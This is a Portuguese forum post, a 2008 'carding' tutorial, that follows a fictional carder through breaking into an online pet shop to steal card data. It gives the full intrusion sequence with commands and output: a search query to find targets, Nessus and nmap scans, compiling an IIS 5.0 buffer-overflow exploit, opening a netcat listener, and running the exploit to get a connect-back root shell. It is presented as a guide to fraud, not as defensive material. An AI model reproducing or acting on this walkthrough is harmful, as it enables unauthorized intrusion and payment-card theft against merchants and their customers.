Raider Productions
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.
Raider Productions

Partilhando Emoções Ao Máximo!!!
 
InícioÚltimas imagensProcurarRegistarEntrar

 

 [Tutorial]Carding Parte 2

Ir para baixo 
AutorMensagem
Raider Productions
Admin
Raider Productions


Mensagens : 184
Data de inscrição : 13/09/2008
Idade : 39
Localização : Lisboa - Lumiar

[Tutorial]Carding Parte 2 Empty
MensagemAssunto: [Tutorial]Carding Parte 2   [Tutorial]Carding Parte 2 Icon_minitimeSex Set 26, 2008 6:18 pm

Métodos de ataque mais comuns e planejamento avançado:
Aqui você verá contos(verdadeiros apesar dos nomes fictícios dos personagens) que mostrarão com detalhes cada ataque de forma separada. Nesse passo que você verá realmente como os carders agem.
Caso 1: Vulnerabilidades em sites comerciais

Um carder, vou chamar ele de Rafael aqui, está louco para comprar aquele lindo Notebook com tecnologia dual core, rede wireless, placa de vídeo de 512MB e 4GB de ram que vem com a distro linux Debian embutida, mas essa belezinha custa exatamente R$8.000,00. Rafael não está no momento com seus amigos por perto, todos estão no interior do Estado viajando(tudo está se passando em São Paulo - SP).

Como não há como fazer um ataque lá muito sofisticado, Rafael decide procurar por brechas de segurança em sites comerciais espalhados pela internet. Um meio mais fácil e rápido para conseguir uma graninha, que no caso, Rafael está precisando muito. Ele liga seu computador localizado no canto de seu quarto, se trata de uma máquina com uma banda larga realmente boa(8mb de velocidade) e rodando um linux Fedora 4. Ele abre seu navegador konqueror e acessa a página no google. Rafael está pensando em uma string bem inteligente para mandar o google pesquisar sobre sites comerciais. Mercado livre não seria uma boa opção nesse momento, então ele pensou:"Hmm...sites de pet shops online costumam vender coisas por cartão, e sua segurança não é lá muito boa..."

Ótima idéia, Rafael envia a seguinte string no formulário do google:

allinurl: "pet shop nacional"

Com isso, vários sites de pet shops brasileiros são "cuspidos" na tela assim que Rafael clica no botão "pesquisar"
Rafael faz uma lista razoável dos principais sites retomados em um editor de texto simples do linux(no caso ele usou o vi direto do terminal). Então ele abriu seu scanner nessus. Como tanto o servidor e o cliente gráfico estão na mesma máquina(ou seja, operando puramente em localhost), Rafael conecta rapidamemte no seu servidor. Ele manda o nessus scannear apenas as portas 80(http) e443(https). Com isso, os scans não serão tão demorados. Na parte de plugins, ele habilita os testes relacionados a servidores web(webservers) e banco de dados(database) apenas. Isso fará com que o nessus descubra furos em servidores web que permitam possivelmente uma invasão e também checará falhas no ssl(secure socket layer) do site, a fim de testar a segurança da criptografia de dadose por último testar falhas de sql injection no site.

Nos três primeiros sites, Rafael não conseguiu nada. Mas no quarto o nessus acusou que uma falha potencialmente perigosa permitiria um invasor obter acesso não autorizado no servidor. Esse se tratava de uma máquina Windows 2000 SP 4, com IIS 5.0 e possivelmente vulnerável.

Rafael quis ter mais certeza, então usou o nmap com os seguintes argumentos em seu terminal(ele executou os comandos como root):

# nmap -sV -O -P0 -vv www.site-possivelmente-vulneravel.com.br

E analisando a saida ecoada em seu terminal, era exatamente isso que o nessus havia dito

TCP/80 OPEN - Microsoft IIS 5.0
TCP/443 OPEN - Microsoft IIS 5.0 (Secure_Socket_Layer)

Device type: General purpose.
Running: Windows NT/2K/XP
OS Detaisl: Windows 2000 SP4

Otimo, agora basta procurar o exploit certo e Rafael poderá ter grandes chances de invadir o servidor web.
O nessus também acusou que a criptografia do ssl era possivelmente falha, o que não dará muitos problemas para Rafael se ele tiver que na hora crackear alguma coisa. Ele começa acessando o security focus(www.securityfocus.com) e procura por IIS 5.0 na barra de search(pesquisar). Logo ele encontra um bid(Bugtrack ID) que fala a respeito de um estouro de buffer na qual se obtem uma shell remotamente por connect back. Ele clicou na aba exploit e havia o exploit disponível em C, e o melhor que era um exploit que se compila no linux, ele baixou o exploit e executou o seguinte comando no terminal:

# gcc -o hell iishack2000.c

Isso gerou um arquivo binário chamado hell.

Rafael executou simplesmente: ./hell e as seguintes instruções ecoaram no seu terminal:

[banker-sys01@root]# ./hell

usage: ./hell <hostname/ip> <port> <your_ip> <shell_port>

Shell_Port significa que Rafael terá que deixar uma porta escutando em seu computador para receber uma shell, e your_ip rafael terá que inserir seu ip real que é 201.142.23.88. Ele abre outro terminal(agora como usuário normal) e digita:

$nc -l -vv -p 1500

Ele deixa a porta tcp 1500 escutando com o netcat(nc). Agora no terminal que esta como root, ele volta a executar o exploit:

./hell www.site-possivelmente-vulneravel.com.br 80 201.142.23.88 1500

O exploit manda Rafael aguardar e enquanto isso ele reza para que o servidor não esteja patcheado. Ele recebe a última mensagem do exploit na tela:

[+] Sucefull! Check the specified tcp port

Ele abre o outro terminal e ve o seguinte:
$nc -l -vv -p 1500
connected from site.....bla bla bla
[root1@root]#
Ir para o topo Ir para baixo
https://raider-productions.forumeiros.com
 
[Tutorial]Carding Parte 2
Ir para o topo 
Página 1 de 1
 Tópicos semelhantes
-
» [Tutorial]Carding Parte 5
» [Tutorial]Carding Parte 6
» [Tutorial]Carding Parte 1
» [Tutorial]Carding Parte 3
» [Tutorial]Carding Parte 4

Permissões neste sub-fórumNão podes responder a tópicos
Raider Productions :: Segurança Digital :: Área Cracker-
Ir para: